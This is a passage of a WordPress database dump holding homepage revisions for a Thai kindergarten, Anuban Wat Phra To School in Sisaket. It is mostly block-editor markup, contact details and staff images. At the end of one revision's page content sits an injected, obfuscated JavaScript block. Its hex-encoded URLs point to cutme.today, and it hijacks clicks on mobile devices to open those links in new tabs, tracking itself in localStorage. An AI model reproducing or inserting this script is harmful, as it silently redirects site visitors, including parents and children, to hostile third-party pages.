inkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2025-07-15 16:25:35','2025-07-15 09:25:35','',19,'http://watprato.ssk.in.th/?p=716',0,'revision','',0),
(717,1,'2025-07-15 16:34:54','2025-07-15 09:34:54','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_fac40f-62\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_937c93-07\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_937c93-07\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"f67ede92\",\"mediaId\":406,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f67ede92\"><img class=\"gb-image gb-image-f67ede92\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:group {\"fontSize\":\"small\",\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group has-small-font-size\"><!-- wp:generateblocks/container {\"uniqueId\":\"36016ef6\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"e194b6ce\",\"mediaId\":401,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-e194b6ce\"><img class=\"gb-image gb-image-e194b6ce\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ3.jpg\" alt=\"\" title=\"รองผู้อำนวยการ3\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"3791db60\",\"mediaId\":404,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-3791db60\"><img class=\"gb-image gb-image-3791db60\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ2-1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ2\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_67610f-d3\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_67610f-d3\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3b4373-bb\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\\u003cbr\\u003eรองผู้อำนวยการโรงเรียน\",\"link\":\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=share_link\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 